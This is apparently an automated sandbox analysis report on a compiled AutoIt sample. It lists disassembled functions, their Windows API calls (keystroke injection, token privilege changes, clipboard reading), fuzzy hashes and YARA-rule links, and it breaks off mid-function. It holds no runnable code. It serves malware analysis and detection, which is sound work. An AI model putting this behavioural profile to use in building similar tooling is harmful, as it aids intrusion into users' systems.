                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CDC20, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?,?,003C799D), ref: 003C766F
                                                                                                                                                                        • Part of subcall function 003C7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C768A
                                                                                                                                                                        • Part of subcall function 003C7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?,?), ref: 003C7698
                                                                                                                                                                        • Part of subcall function 003C7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003C758C,80070057,?), ref: 003C76A8
                                                                                                                                                                      • IIDFromString.OLE32(00000000,?,?,?,003CDAA9,?,?,?,?,?,?,?,?,?), ref: 003CDC57
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                      • Opcode ID: 2ff1b2ddcfde587a845af552a510003ab002eecda14526b867d4c9176cfa9e27
                                                                                                                                                                      • Instruction ID: ee63c063a183299446faeca424871ca77198287de6d6b814c8abcc85cbade133
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff1b2ddcfde587a845af552a510003ab002eecda14526b867d4c9176cfa9e27
                                                                                                                                                                      • Instruction Fuzzy Hash: 94F044B52446059BCB02DF09D880BA6BBA8AB05360B11C13AFD08DE155C3F1E900EBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374FAA, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,004362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00374FDE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: 789f0df33d0fc91f7eb9dc149f3abd5b36299339959efc58ff3487d0b792af56
                                                                                                                                                                      • Instruction ID: 47be23ba86c79596aecf94b2401559fc08081f54eddfc85d90b645b035e8077e
                                                                                                                                                                      • Opcode Fuzzy Hash: 789f0df33d0fc91f7eb9dc149f3abd5b36299339959efc58ff3487d0b792af56
                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF03971105712CFCB369F64E494822BBE5BF04329322CA3EE5DB82A10C735A880DF40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003909D5, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 003909F4
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2514874351-0
                                                                                                                                                                      • Opcode ID: 080fee1df63ca02fbdb8c56c53e9d23022109b7d8c2d2bdbccb62cf6d388a1a0
                                                                                                                                                                      • Instruction ID: e3f481b02040d2b1adf7e6a1e8aa15beae9c42dd96d821382f7bc066df93dc2f
                                                                                                                                                                      • Opcode Fuzzy Hash: 080fee1df63ca02fbdb8c56c53e9d23022109b7d8c2d2bdbccb62cf6d388a1a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 70E0CD369042285BC731D69C9C05FFA77EDDF89790F0441B5FC0CD7214DA649C818690
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D74A9, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: bb63e26d6b5becca1c373ea397c33e38cda2cfaa62e343d6d8b09c110dc5d98d
                                                                                                                                                                      • Instruction ID: a04373a6e7b13dbcbbe7a192c94fef163a1fb847e7a307ff84d97d0ff6d0d4e4
                                                                                                                                                                      • Opcode Fuzzy Hash: bb63e26d6b5becca1c373ea397c33e38cda2cfaa62e343d6d8b09c110dc5d98d
                                                                                                                                                                      • Instruction Fuzzy Hash: B4D01272424318BF57298B65EC06CB77AACE905221740036FBC0581600F6A1BC0086A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00392E84, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00393457: __lock.LIBCMT ref: 00393459
                                                                                                                                                                      • __onexit_nolock.LIBCMT ref: 00392EA0
                                                                                                                                                                        • Part of subcall function 00392EC8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00392EA5,003AB80A,0042BB50), ref: 00392EDB
                                                                                                                                                                        • Part of subcall function 00392EC8: DecodePointer.KERNEL32(?,?,00392EA5,003AB80A,0042BB50), ref: 00392EE6
                                                                                                                                                                        • Part of subcall function 00392EC8: __realloc_crt.LIBCMT ref: 00392F27
                                                                                                                                                                        • Part of subcall function 00392EC8: __realloc_crt.LIBCMT ref: 00392F3B
                                                                                                                                                                        • Part of subcall function 00392EC8: EncodePointer.KERNEL32(00000000,?,?,00392EA5,003AB80A,0042BB50), ref: 00392F4D
                                                                                                                                                                        • Part of subcall function 00392EC8: EncodePointer.KERNEL32(003AB80A,?,?,00392EA5,003AB80A,0042BB50), ref: 00392F5B
                                                                                                                                                                        • Part of subcall function 00392EC8: EncodePointer.KERNEL32(00000004,?,?,00392EA5,003AB80A,0042BB50), ref: 00392F67
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3536590627-0
                                                                                                                                                                      • Opcode ID: 0b8f8fdf75155ef6cfad6b7237068c20b048f39f0432029b245be34263e8c75f
                                                                                                                                                                      • Instruction ID: 319fd816c49909d41697355d401694485b1a9c8f910cf308dfa5aef74c601cf0
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b8f8fdf75155ef6cfad6b7237068c20b048f39f0432029b245be34263e8c75f
                                                                                                                                                                      • Instruction Fuzzy Hash: 47D012B1D4061DAADF52FBE5990276D7A706F44762F544145F014AE1C2CB7806015B95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003AFD76, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: faa3c99ffc90cada764730cf8f961ef709473b6c1c0eb87abb188e45870a546c
                                                                                                                                                                      • Instruction ID: 4a7b50620ac579f1444a1313cbe937d8abc17200fadeb7c3d84665ded17628da
                                                                                                                                                                      • Opcode Fuzzy Hash: faa3c99ffc90cada764730cf8f961ef709473b6c1c0eb87abb188e45870a546c
                                                                                                                                                                      • Instruction Fuzzy Hash: 06D0C771504141CFD772EF69E404756B7E89F14304F24852AE4D585A50D77A98859B11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039548B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                      • Instruction ID: 6de63ee20c2fd429b70d5dbee61c3ed3cd337f339d877ab64796b8407c011664
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                      • Instruction Fuzzy Hash: E2B0927684020C77EE422E82EC03A593B199B40678F808020FB0C1C162A673A6A09689
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00393598, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _doexit.LIBCMT ref: 003935A2
                                                                                                                                                                        • Part of subcall function 00393469: __lock.LIBCMT ref: 00393477
                                                                                                                                                                        • Part of subcall function 00393469: RtlDecodePointer.NTDLL(0042BB70,0000001C,003933C2,00391013,00000001,00000000,?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 003934B6
                                                                                                                                                                        • Part of subcall function 00393469: DecodePointer.KERNEL32(?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 003934C7
                                                                                                                                                                        • Part of subcall function 00393469: EncodePointer.KERNEL32(00000000,?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 003934E0
                                                                                                                                                                        • Part of subcall function 00393469: DecodePointer.KERNEL32(-00000004,?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 003934F0
                                                                                                                                                                        • Part of subcall function 00393469: EncodePointer.KERNEL32(00000000,?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 003934F6
                                                                                                                                                                        • Part of subcall function 00393469: DecodePointer.KERNEL32(?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 0039350C
                                                                                                                                                                        • Part of subcall function 00393469: DecodePointer.KERNEL32(?,00393310,000000FF,?,00399E6E,00000011,00391013,?,00399CBC,0000000D), ref: 00393517
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2158581194-0
                                                                                                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                      • Instruction ID: f881657d5e4d0e582f8fa538fc88e89db6f6048b8894770bce380394d0fcac39
                                                                                                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                      • Instruction Fuzzy Hash: B3B012715C030C73DE123946EC03F153B0D4740B54F100020FA0C5C1E1A5D3766040C9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 003FCDAC, Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003FCE50
                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003FCE91
                                                                                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003FCED6
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003FCF00
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FCF29
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 003FCFA1
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 003FCFC2
                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 003FCFCF
                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003FCFE5
                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 003FCFEF
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003FD018
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FD03F
                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,003FB602), ref: 003FD145
                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003FD15B
                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003FD16E
                                                                                                                                                                      • SetCapture.USER32(?), ref: 003FD177
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 003FD1DC
                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003FD1E9
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003FD203
                                                                                                                                                                      • ReleaseCapture.USER32(?,?,?), ref: 003FD20E
                                                                                                                                                                      • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 003FD248
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003FD255
                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003FD2B1
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FD2DF
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003FD31C
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FD34B
                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003FD36C
                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003FD37B
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 003FD39B
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003FD3A8
                                                                                                                                                                      • GetParent.USER32(?), ref: 003FD3C8
                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003FD431
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FD462
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 003FD4C0
                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003FD4F0
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003FD51A
                                                                                                                                                                      • SendMessageW.USER32 ref: 003FD53D
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 003FD58F
                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003FD5C3
                                                                                                                                                                        • Part of subcall function 003725DB: GetWindowLongW.USER32(?,000000EB), ref: 003725EC
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003FD65F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                      • String ID: @GUI_DRAGID$F$prC
                                                                                                                                                                      • API String ID: 3977979337-2809985458
                                                                                                                                                                      • Opcode ID: f7fb3e5c0064e88a06b2584c55c8694514f93df6cff378ca0d095c6e413bbc34
                                                                                                                                                                      • Instruction ID: 661bf6579f3df7cf01e2a657f7459345a21d4691471467d5d48dced58c5d8ce2
                                                                                                                                                                      • Opcode Fuzzy Hash: f7fb3e5c0064e88a06b2584c55c8694514f93df6cff378ca0d095c6e413bbc34
                                                                                                                                                                      • Instruction Fuzzy Hash: E642AD74204349EFD726CF28C948EBABBE9FF49314F15452DF699872A1CB319850CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374A35, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00374A3D
                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003ADA8E
                                                                                                                                                                      • IsIconic.USER32(?), ref: 003ADA97
                                                                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 003ADAA4
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003ADAAE
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003ADAC4
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003ADACB
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003ADAD7
                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 003ADAE8
                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 003ADAF0
                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 003ADAF8
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003ADAFB
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003ADB10
                                                                                                                                                                      • keybd_event.USER32 ref: 003ADB1B
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003ADB25
                                                                                                                                                                      • keybd_event.USER32 ref: 003ADB2A
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003ADB33
                                                                                                                                                                      • keybd_event.USER32 ref: 003ADB38
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003ADB42
                                                                                                                                                                      • keybd_event.USER32 ref: 003ADB47
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003ADB4A
                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 003ADB71
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                      • Opcode ID: 2eda59e12485def821f0478ba339b6318738244a71e16d31739301cd9fe77118
                                                                                                                                                                      • Instruction ID: 538a55a38eed196a546bd5b99cd750f0d312c59d582c5e0c54ba07d5bb2c113d
                                                                                                                                                                      • Opcode Fuzzy Hash: 2eda59e12485def821f0478ba339b6318738244a71e16d31739301cd9fe77118
                                                                                                                                                                      • Instruction Fuzzy Hash: FA315071A80318BFEB226FA19C49F7E7E6CEF45B50F114025FE05EA1D0CAB45910EAA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8858, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003C8D0D
                                                                                                                                                                        • Part of subcall function 003C8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003C8D3A
                                                                                                                                                                        • Part of subcall function 003C8CC3: GetLastError.KERNEL32 ref: 003C8D47
                                                                                                                                                                      • _memset.LIBCMT ref: 003C889B
                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003C88ED
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003C88FE
                                                                                                                                                                      • OpenWindowStationW.USER32 ref: 003C8915
                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 003C892E
                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 003C8938
                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003C8952
                                                                                                                                                                        • Part of subcall function 003C8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003C8851), ref: 003C8728
                                                                                                                                                                        • Part of subcall function 003C8713: CloseHandle.KERNEL32(?,?,003C8851), ref: 003C873A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                                                                      • Opcode ID: 4c7d3f2a0cc72e76c13fc793205d3ac3d3572fb5994198e59f4efa79a2a7b223
                                                                                                                                                                      • Instruction ID: ba84670d97d704f168108227d1c7399386ae1e71d8a491e94a6cde78f8ec1835
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c7d3f2a0cc72e76c13fc793205d3ac3d3572fb5994198e59f4efa79a2a7b223
                                                                                                                                                                      • Instruction Fuzzy Hash: F7814576900219AFDF12DFA4DC45EFEBBB8AF04304F19456AF910E6261DB318E14DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E425A, Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenClipboard.USER32(003FF910), ref: 003E4284
                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 003E4292
                                                                                                                                                                      • GetClipboardData.USER32 ref: 003E429A
                                                                                                                                                                      • CloseClipboard.USER32 ref: 003E42A6
                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 003E42C2
